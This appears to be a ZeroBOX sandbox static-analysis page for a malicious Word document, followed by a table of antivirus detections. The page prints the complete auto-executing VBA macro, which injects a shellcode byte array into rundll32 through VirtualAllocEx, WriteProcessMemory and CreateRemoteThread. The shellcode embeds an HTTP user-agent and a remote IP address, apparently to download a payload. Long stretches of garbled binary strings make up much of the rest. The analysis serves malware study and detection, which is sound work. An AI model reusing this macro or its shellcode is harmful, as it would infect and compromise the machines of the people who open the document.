Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Image1, 0, 0, MSForms, Image"

Attribute VB_Name = "NewMacros" Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type #If VBA7 Then Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long #Else Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long #End If Sub Auto_Open() Project.ThisDocument.Image1.Top = 0 Project.ThisDocument.Image1.Width = 0 Dim myByte As Long, myArray As Variant, offset As Long Dim pInfo As PROCESS_INFORMATION Dim sInfo As STARTUPINFO Dim sNull As String Dim sProc As String #If VBA7 Then Dim rwxpage As LongPtr, res As LongPtr #Else Dim rwxpage As Long, res As Long #End If myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _ 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _ -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _ -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _ -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 8, -26, 0, 0, 83, 80, 104, 87, -119, -97, _ -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _ 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _ -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _ -1, -1, 47, 67, 110, 117, 54, 0, -118, -88, 120, -44, -8, 105, -71, -53, -2, 65, 45, 114, 46, 23, -72, 119, -52, -92, 11, -34, -15, -64, -32, 66, 91, -122, -93, 15, -36, 126, 102, 33, _ 87, -85, -47, 106, -91, -5, 65, 41, -116, 91, -114, 75, -72, -55, 41, -102, 80, 93, -116, -109, -68, 25, 111, 47, 107, -27, -76, 27, -85, 121, 39, 105, 76, 110, -112, -22, 106, -123, 53, -24, _ -45, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _ 83, 73, 69, 32, 55, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 53, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 52, 46, 48, 59, 32, 46, 78, _ 69, 84, 32, 67, 76, 82, 32, 50, 46, 48, 46, 53, 48, 55, 50, 55, 41, 13, 10, 0, 4, -100, -117, -43, -37, -58, -25, -5, 2, 61, 89, 52, -112, 2, 5, 39, 19, -16, 90, 78, _ 73, 73, -115, 70, -65, -116, -38, -35, -63, -58, 61, -19, -82, -120, -74, -66, 115, 28, -5, 35, -64, -35, 114, 106, -4, 59, -61, -112, -85, 88, 83, -70, 35, -110, 121, 45, 25, 124, 80, -59, _ -107, 108, 119, -104, -2, 89, -75, 22, -85, -47, -117, -45, -94, 68, 71, -67, -126, -50, -95, -106, 83, 61, 32, -96, 122, 79, -87, -101, 53, -74, -106, -126, 74, -56, -108, -5, 44, 19, -54, -128, _ -15, 30, 80, 86, 33, -83, -46, -20, -82, 17, 78, -97, 73, -69, 4, 86, 36, -67, 92, -110, -89, -93, -113, -20, -69, -36, 39, -126, -124, 120, -18, -25, 97, -90, 40, 65, -73, 73, 16, 72, _ -70, -31, 18, 10, -107, -101, 78, 57, -29, 127, 30, 12, 6, -74, 1, 83, -19, 2, -92, -95, 86, 118, 67, -108, -58, -2, -11, 12, -8, -92, -87, -18, 76, -47, -54, -101, 15, 62, -88, -93, _ 115, 38, 8, 43, -75, 62, 97, -54, 105, -112, -2, -117, -72, -41, -55, -37, -59, -114, -63, -100, -97, 55, -10, -12, -5, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _ 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _ -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 49, 46, 51, 53, 46, 49, 48, 48, 46, 50, 49, 49, 0, 73, -106, 2, -46) If Len(Environ("ProgramW6432")) > 0 Then sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe" Else sProc = Environ("windir") & "\\System32\\rundll32.exe" End If res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo) rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40) For offset = LBound(myArray) To UBound(myArray) myByte = myArray(offset) res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&) Next offset res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub

bjbjb3b3

sokc____

`:Ua9f<.

`*^"$N

m(p`39

RFBRUd

AY461K_

Dp+]1&G

CECpod(

iE(Nyp

?A'.8ES

MMFUi:

PPtPepL

&Ik3_t<]

R3_ISg"

3T-\:S

$gC&">

Jm)a(?n

ETri~a

Z+{Bg;

\kRBe.I

fv`v`v

97;0;p

hNuv`v

#/"p1c

hNuv`v

I7&mRaG

E0)ZRh

@%!PmN

}t7BWmv<u

mId/lz

fd#HwAm6

Luv`v`

zK(:)Z

9W>;0v`

v,o$P*

"l(?nZ

+B7#`:

F/hJ1`

o`;`L

$rgL(f

KBqi^[4

Iiixb3

hNuv`v

.K+ury

qaVc6t

Ev2Jne

Y`]v,^

Baffa<^.

.zoQ.q

6ZNTGnN

Gr"]XF

yY6i2.

y?W4;0;

"xiZRd

2;0;0;

yta,&i

FL6"D$2

XDri>/

}v`v`v

?ygpF

_!8La

WY$EDt

M$?r"da

ZJE$?v

"O.yt;

XWGlB%+

d>#k;&6

y960JN

|So,Ky

d~N68l

gR:g`U

7fNzf3

lnGp?-W

*=k8d/

x1R{6e

sq1v/>

W%k*V%

l(%?Qu

J !ny;

yuU5=/Q#

UYe%.-

?,cvaf

\_gnW>5

?'%A!z

xkGhLs

an7N-Ju

6+j!9R

)1#B/7E5<s@S7p<5]#]

ibW\j9

404ln0

xdx6L4

Lk`a(xA

H!RMK~

"FC[eC

0$r$l2J

4ti,zh

f`'`!`"

,b|F\A

~Bc#lvqGA6GSK}F

zSTmVl

]nS3xr

A$]>?&.b

t@a]`Y

P@v A0

/(1%w#N

;jdz(V

QP!Ze^

*xaixb

+fe[!P\<A

v!Llr=

S-=&`b

&l#Ljz

a'xcHl

FxU~:>

Tx:R]Lg

Zui"fg*|

'"Pvtw

}P-4>%A8

"HSHg_F

Cx/9F2

:2~_ s

y p p p

t p p p p

nk`tSO

#DruWv

:s1N9Z)

Ol 5e,

I=*T2"

&,ZIu^

)ZiFbf

Hx|yD T%

@)6Wz(

I+0+uu

gx:G |

O~rMPi

zJLHCi

$Ef[ZMY

F%`E+M

Iu+5Z

Z.lZW@0

'1 hd,

N7_t9b

v!L=TERm

=`1Fxd

AFlz(?

0oqr!$qR

"<.$"$9

]}tdw|

XTmARa<

6beh-(

n-B,_C

a UORs

VPUg[2,

/_Bo=

6YIE$7K

vj";uh!\

:{L5,tw

A^P>eD

b)fmUP%%

1r :sv=r8:s

GNmnHw~

wc9Rf%;

_jw"f2

ll;#|h

|O}+?)

0<{>(<|

pbmf'B^

abM:LFyt

75l{l!5

1[gG))

jW7Fi^

D>!8WI

H:gf9w

/:5x&)

h/)9F.Ur

A>1 VA/

j/r".lE

KJEYnb

IVQ*__

Jg{t}Kw

tvgqm!^

U]\q(M

'\E/T

pzf%_i

tm)A_af

9O3v9r&k

CY b00

K"BE_8

.P~P&nR

'leG<

l`&PIY

)HDjeg

<fZz~

r;Uj6+1

q;[:`k6=

N~pBZ

P VIA}

^q3,(+Q

Iw[0?FbR

U6YN><

;pV73^

)t8%f2

!|3]W-3

6?v077

z _&;qtS

Or|1u3

s.IvjW

Z&w2 @

(o(/>i

UJu<J/(

CDG%_j

CL\:%uD

`$_Pq!

?1EDb1

v*tS4#:

2Q 5KZ|

2w\DsHU'

vLuVGsHSq

5ST/^T

.!G6lH

pBhCzC

{RnuW\K=7

,HO)/p

`#j'ic

5\8=LO

,yvjmMP

eGjBZx

*%S5EQ

}Pr2k>

GlR!9r

9):WxdeI

h=e"g#

DR8zXD

U;ezIv

&,l*E*

Y:s pO6

4~6:~&

(^Q+]r(u]

<it[}o

2&$AE$

q81F9U

k+k;@?:

.u/"S&

Qdckt2vCI

U^/e^J

Z\:$%9

eB0{gt

GV)4Fax

[{4E$o

qb8ouGGk~

I9j1J

6X'<)3T)xR;

3sj)*xJ

xg()*s

IU>!-O

U\MU(yq

NH3T^EI)h

*]tF~$*

K9~Bq8

J,)JHnm

32sb`f

?M,WSG

`+GUW\

2#KIQr

)BR"z$

*g^b5W

2@&XFN

Bwc%E9

*DI"D4O\T#

@I8%\D

M> TO7

1f1M>y

kxsz`X

k=DFD5f

av17Xe

Nlo,[0T

eWZBpw

Da.LW4

^^?jD?

0g1Tvo

27J^lp

6krcY<;

cEFFFF

Wxcp|u#8"

pH/n|@4D]

'$j&5E4

e6bYX[

+9nwI@P

Y/"py'

-plbH2[Zl

E7)Eb)

H2@.*O

ii)L[3

b be]S'mx0X

pJM(roe

7@Q[18ix*o

HU*u,B

X^&bUCIn

"%J>%Ly

$@cM']l

o}:fsL$

_]|xLa

+,Il+T6

jj%uuE

6!\z`F

7)m1l<)g

<#us.R

s}g$Mp

IQ=UT<%

u4r"^d

U|Hl4>Og

zMjC[)0

k,NLa[

$1i6Jg

Nw"I|\

$h1Kj

[[i $x

66c" B

<BDS.9

w`wfw4v{^

gq6Kq6\41

.u/_2j

=[Y2^2

&@)Tju

C-/>Z`

`:Ua9f<.

`*^"$N

m(p`39

RFBRUd

AY461K_

Dp+]1&G

CECpod(

Microsoft Forms 2.0 Image

Embedded Object

Forms.Image.1

www.meitu.com

%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

uMYmKHr

ndVb0q

FW<`N

8xG*zds

A3@BG(a

a!bNY2G_l

aBA$O2j2

MV=Z-R;

Agcgek.

MV{K-GQ

]j0i~6

5+y|Aw

5/xVO

xfYltkmb=:)

u[{][A

rn'z#e@

Z4W-au@

R]B48.

>nO^O<

hVu$HA

1=z7P:

}V]%ch

*5+i#)

e@R8^3

6p9S81

kr%Ee9

=1@Bj

22@Ddu<

nP8 }?

+I.L~z}

H0A'o

Jx,Z%

<zc<r9

wqoe$~I

#t~c

)%.`BI

O^2N{z

&Cg;FG=9

j7fCRI

V{dbIP

_eYZ@2

jSBDb\m

P;`p==q

>]6&Ll

TNI(2O\

<sie!V

nfy0]s

@mx{H

`}ON?

e9N? (

y^p'p{

k{{33J

2Io(@I*H

iE(Nyp

?A'.8ES

MMFUi:

PPtPepL

&Ik3_t<]

R3_ISg"

3T-\:S

$gC&">

Jm)a(?n

ETri~a

Z+{Bg;

\kRBe.I

fv`v`v

97;0;p

hNuv`v

#/"p1c

hNuv`v

I7&mRaG

E0)ZRh

@%!PmN

}t7BWmv<u

mId/lz

fd#HwAm6

Luv`v`

zK(:)Z

9W>;0v`

v,o$P*

"l(?nZ

+B7#`:

F/hJ1`

o`;`L

$rgL(f

KBqi^[4

Iiixb3

hNuv`v

.K+ury

qaVc6t

Ev2Jne

Y`]v,^

Baffa<^.

.zoQ.q

6ZNTGnN

Gr"]XF

yY6i2.

y?W4;0;

"xiZRd

2;0;0;

yta,&i

FL6"D$2

XDri>/

}v`v`v

?ygpF

_!8La

WY$EDt

M$?r"da

ZJE$?v

"O.yt;

XWGlB%+

d>#k;&6

y960JN

|So,Ky

d~N68l

gR:g`U

7fNzf3

lnGp?-W

*=k8d/

x1R{6e

sq1v/>

W%k*V%

l(%?Qu

J !ny;

yuU5=/Q#

UYe%.-

?,cvaf

\_gnW>5

?'%A!z

xkGhLs

an7N-Ju

6+j!9R

)1#B/7E5<s@S7p<5]#]

ibW\j9

404ln0

xdx6L4

Lk`a(xA

H!RMK~

"FC[eC

0$r$l2J

4ti,zh

f`'`!`"

,b|F\A

~Bc#lvqGA6GSK}F

zSTmVl

]nS3xr

A$]>?&.b

t@a]`Y

P@v A0

/(1%w#N

;jdz(V

QP!Ze^

*xaixb

+fe[!P\<A

v!Llr=

S-=&`b

&l#Ljz

a'xcHl

FxU~:>

Tx:R]Lg

Zui"fg*|

'"Pvtw

}P-4>%A8

"HSHg_F

Cx/9F2

:2~_ s

y p p p

t p p p p

nk`tSO

#DruWv

:s1N9Z)

Ol 5e,

I=*T2"

&,ZIu^

)ZiFbf

Hx|yD T%

@)6Wz(

I+0+uu

gx:G |

O~rMPi

zJLHCi

$Ef[ZMY

F%`E+M

Iu+5Z

Z.lZW@0

'1 hd,

N7_t9b

v!L=TERm

=`1Fxd

AFlz(?

0oqr!$qR

"<.$"$9

]}tdw|

XTmARa<

6beh-(

n-B,_C

a UORs

VPUg[2,

/_Bo=

6YIE$7K

vj";uh!\

:{L5,tw

A^P>eD

b)fmUP%%

1r :sv=r8:s

GNmnHw~

wc9Rf%;

_jw"f2

ll;#|h

|O}+?)

0<{>(<|

pbmf'B^

abM:LFyt

75l{l!5

1[gG))

jW7Fi^

D>!8WI

H:gf9w

/:5x&)

h/)9F.Ur

A>1 VA/

j/r".lE

KJEYnb

IVQ*__

Jg{t}Kw

tvgqm!^

U]\q(M

'\E/T

pzf%_i

tm)A_af

9O3v9r&k

CY b00

K"BE_8

.P~P&nR

'leG<

l`&PIY

)HDjeg

<fZz~

r;Uj6+1

q;[:`k6=

N~pBZ

P VIA}

^q3,(+Q

Iw[0?FbR

U6YN><

;pV73^

)t8%f2

!|3]W-3

6?v077

z _&;qtS

Or|1u3

s.IvjW

Z&w2 @

(o(/>i

UJu<J/(

CDG%_j

CL\:%uD

`$_Pq!

?1EDb1

v*tS4#:

2Q 5KZ|

2w\DsHU'

vLuVGsHSq

5ST/^T

.!G6lH

pBhCzC

{RnuW\K=7

,HO)/p

`#j'ic

5\8=LO

,yvjmMP

eGjBZx

*%S5EQ

}Pr2k>

GlR!9r

9):WxdeI

h=e"g#

DR8zXD

U;ezIv

&,l*E*

Y:s pO6

4~6:~&

(^Q+]r(u]

<it[}o

2&$AE$

q81F9U

k+k;@?:

.u/"S&

Qdckt2vCI

U^/e^J

Z\:$%9

eB0{gt

GV)4Fax

[{4E$o

qb8ouGGk~

I9j1J

6X'<)3T)xR;

3sj)*xJ

xg()*s

IU>!-O

U\MU(yq

NH3T^EI)h

*]tF~$*

K9~Bq8

J,)JHnm

32sb`f

?M,WSG

`+GUW\

2#KIQr

)BR"z$

*g^b5W

2@&XFN

Bwc%E9

*DI"D4O\T#

@I8%\D

M> TO7

1f1M>y

kxsz`X

k=DFD5f

av17Xe

Nlo,[0T

eWZBpw

Da.LW4

^^?jD?

0g1Tvo

27J^lp

6krcY<;

cEFFFF

Wxcp|u#8"

pH/n|@4D]

'$j&5E4

e6bYX[

+9nwI@P

Y/"py'

-plbH2[Zl

E7)Eb)

H2@.*O

ii)L[3

b be]S'mx0X

pJM(roe

7@Q[18ix*o

HU*u,B

X^&bUCIn

"%J>%Ly

$@cM']l

o}:fsL$

_]|xLa

+,Il+T6

jj%uuE

6!\z`F

7)m1l<)g

<#us.R

s}g$Mp

IQ=UT<%

u4r"^d

U|Hl4>Og

zMjC[)0

k,NLa[

$1i6Jg

Nw"I|\

$h1Kj

[[i $x

66c" B

<BDS.9

w`wfw4v{^

gq6Kq6\41

.u/_2j

=[Y2^2

&@)Tju

C-/>Z`

Normal.dotm

Microsoft Office Word

Image1, 0, 0, MSForms, Image

Attribut

e VB_Nam

e = "Thi

sDocumen

1Normal

VGlobal!

Pre decla

lateDeri

$Custom

Imag e1, 0

l Length As Long, ByVal LengthWrote As Long) As Long

Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long

CreateRemoteThread

VirtualAllocEx

WriteProcessMemory

CreateProcessA

Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long

Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long

Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVa

ProgramW6432$

windir$

\\SysWOW64\\rundll32.exe

windir$

\\System32\\rundll32.exe

Attribut

e VB_Nam

e = "New

Macros"

ype PROC

ESS_INFO

RMATION

ess As L

STARTU&P

Reserve

lpDes0ktop

ntChar

d wFlag

howWindo

UIntege

hStdInpuFt

E0rror

A7 The

trSafe

Functio

uff Lib

"kernel3

2" Alias

" (ByVHal

dwSptack

r tAddr

r, lpPar

AdIAlloc

IV@irtual

xtecFH

@W\ri{@

M Ar>y_

f Sourc

lpComman

lepgV]

Environm

bnupInf>o

rD/+GY

F$iF

s?E_se?E?E

s?Eing

7Eri?Elp?E?

uto_@Open()

.ThisD

P.Ima ge1.T

Dim myBy

'myArra

"TVariant

, offse

(-4, -2

119, 0%

-27,$ 4

104, 58,

86, 121`, -89

B%7B6@Jd-5@

g"7aM *

If Len(

Environ(

"Program

W6432"))

> 0 The

windir

") & "\\ SysWO

rundll32 .exe"

RunStuf

f(sNull,

, ByVaPl 0&

Info,

Array),

For off(set

Write/

Workbhook

myArray

offset

pInfoR

sInfo:

sProcpJ`

rwxpage

Environ

AutoOpen

Workbook_Open

Documentj

Project

\G{00020

0046}#

2.0#0#C:

\Windows

\System3

e2.tlb

#OLE Aut

omation

ENormal

!Offic

DF8D04C-

5BFA-101@B-BDE5

ram File

s\Common

Microso

ft Share

d\OFFICE

16\MSO.D

M 16 .0 Ob

ibrary

D452EE1-

-02608C@4D0BB4

dFM20L'B

00}t#0B

B7BE7D-F

0D9-4A6F

6B90E389!

6User@

\AppData

\Local\T

emp\Word

bB7.ex

ThisDocu

ThisDocument

NewMacros

ID="{6895AAB0-3FF5-4235-A514-FC21F466E3D1}"

Document=ThisDocument/&H00000000

Module=NewMacros

Name="Project"

HelpContextID="0"

VersionCompatible32="393222000"

CMG="92904AFBD9FFD9FFD9FFD9FF"

DPB="2527FD6C03FE04FE04FE"

GC="B8BA60936193616C"

[Host Extender Info]

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

&H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000

[Workspace]

ThisDocument=0, 0, 0, 0, C

NewMacros=62, 62, 1650, 732,

Microsoft Word 97-2003

Win64x

stdole

Project-

ThisDocument<

_Evaluate

Normal

Office

MSFormsC

Image1_

NewMacros

checko

PROCESS_INFORMATION

hProcess

hThread

dwProcessId$

dwThreadId

STARTUPINFO

lpReserved

lpDesktop

lpTitle

dwXSize

dwYSize

dwXCountChars

dwYCountChars

dwFillAttribute$g`

dwFlags/

wShowWindow

cbReserved2

lpReserved2

hStdInput]

hStdOutput

hStdError0

CreateStuff

lpThreadAttributes

dwStackSize%F`

lpStartAddress

lpParameter

dwCreationFlags

lpThreadID

kernel32_

AllocStuffg

lpAddrZ

flAllocationType

flProtect

WriteStuff

lDestK

SourceG

LengthY

LengthWrote!m`

RunStuff

lpApplicationName

lpCommandLine

lpProcessAttributes`

bInheritHandles

lpEnvironmentp

lpCurrentDirectoryE

lpStartupInfo

lpProcessInformationui`

Auto_OpenV `

myByte

[Content_Types].xml

_rels/.rels

theme/theme/themeManager.xml

theme/theme/theme1.xml

Z77'd]

theme/theme/_rels/themeManager.xml.rels

K(M&$R(.1

[Content_Types].xmlPK

_rels/.relsPK

theme/theme/themeManager.xmlPK

theme/theme/theme1.xmlPK

theme/theme/_rels/themeManager.xml.relsPK

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

& 0 2 3 :

MSWordDoc

Word.Document.8

CONTROL Forms.Image.1 \s

Root Entry

WordDocument

ObjectPool

_1694103469

CompObj

ObjInfo

OCXNAME

Image1

contents

1Table

SummaryInformation

DocumentSummaryInformation

Macros

ThisDocument

NewMacros

(1Normal.ThisDocument

*\R8005*#72

_VBA_PROJECT

PROJECTwm

PROJECT

0000000046}#8.7#0#C:\Program Files\Microsoft Office\root\

tThisDocument

sNewMacros

*\G{87B7BE7D-F0D9-4

*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications

*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library

*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation

*\CNormal

*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library

*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library

*\G{87B7BE7D-F0D9-4A6F-9D7D-07AD6B90E389}#2.0#0#C:\Users\SLL\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library

ThisDocument

0;6345c3c5

ThisDocument

NewMacros

0@6345c463

NewMacros

Project.NewMacros.Auto_Open

Project.NewMacros.AutoOpen

Project.NewMacros.Workbook_Open

PROJECT.NEWMACROS.AUTOOPEN

PROJECT.NEWMACROS.AUTO_OPEN

PROJECT.NEWMACROS.WORKBOOK_OPEN

Unknown

Times New Roman

Symbol

_GB2312

DengXian

Light

Cambria Math

!%),.:;>?]}

CompObj

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.Script.Generic.a!c
Elastic	malicious (high confidence)
DrWeb	W97M.DownLoader.631
ClamAV	Doc.Macro.Injection-6355574-0
CMC	Clean
CAT-QuickHeal	W97M.Donoff.B
ALYac	Trojan.Downloader.DOC.Gen
Malwarebytes	Clean
VIPRE	Clean
Sangfor	Malware.Generic-VBS.Save.f5fb1099
K7AntiVirus	Clean
K7GW	Clean
BitDefenderTheta	Clean
Cyren	W97M/Agent.ACE.gen!Eldorado
Symantec	Clean
ESET-NOD32	VBA/TrojanDownloader.Agent.WOE
TrendMicro-HouseCall	W2KM_POWLOAD.SME
Avast	VBA:Dropper-AK [Trj]
Cynet	Malicious (score: 99)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	VB:Trojan.Valyria.163
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware	Clean
MicroWorld-eScan	VB:Trojan.Valyria.163
Tencent	OLE.Win32.Macro.704456
Ad-Aware	VB:Trojan.Valyria.163
Emsisoft	VB:Trojan.Valyria.163 (B)
Comodo	TrojWare.VBS.Crypt.BN@8aystx
F-Secure	Clean
Baidu	VBA.Trojan.Kryptik.d
Zillya	Clean
TrendMicro	W2KM_POWLOAD.SME
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.gb
FireEye	VB:Trojan.Valyria.163
Sophos	ATK/VbShlCde-A
SentinelOne	Static AI - Malicious OLE
GData	VB:Trojan.Valyria.163
Jiangmin	Clean
Avira	VBA/Dldr.Agent.dtfve
Antiy-AVL	Trojan/Generic.ASMacro.2DA0F
Kingsoft	Clean
Gridinsoft	Clean
Arcabit	VB:Trojan.Valyria.163
ViRobot	DOC.Z.Agent.457216
ZoneAlarm	Clean
Microsoft	TrojanDownloader:O97M/Bartallex.AA
TACHYON	Suspicious/W97M.MDRP.Gen
AhnLab-V3	VBA/Downloader.S12
Acronis	Clean
McAfee	RDN/Bartallex
MAX	malware (ai score=100)
VBA32	Clean
Zoner	Clean
Rising	Macro.Agent.bn (CLASSIC)
Yandex	Clean
Ikarus	Trojan.VBA.Crypt
MaxSecure	Clean
Fortinet	VBA/Kryptik.A!tr
AVG	VBA:Dropper-AK [Trj]

Antivirus

Signature

Bkav

Clean

Lionic

Trojan.Script.Generic.a!c

Elastic

malicious (high confidence)

DrWeb

W97M.DownLoader.631

ClamAV

Doc.Macro.Injection-6355574-0

CMC

Clean

CAT-QuickHeal

W97M.Donoff.B

ALYac

Trojan.Downloader.DOC.Gen

Malwarebytes

Clean

VIPRE

Clean

Sangfor

Malware.Generic-VBS.Save.f5fb1099

K7AntiVirus

Clean

K7GW

Clean

BitDefenderTheta

Clean

Cyren

W97M/Agent.ACE.gen!Eldorado

Symantec

Clean

ESET-NOD32

VBA/TrojanDownloader.Agent.WOE

TrendMicro-HouseCall

W2KM_POWLOAD.SME

Avast

VBA:Dropper-AK [Trj]

Cynet

Malicious (score: 99)

Kaspersky

UDS:DangerousObject.Multi.Generic

BitDefender

VB:Trojan.Valyria.163

NANO-Antivirus

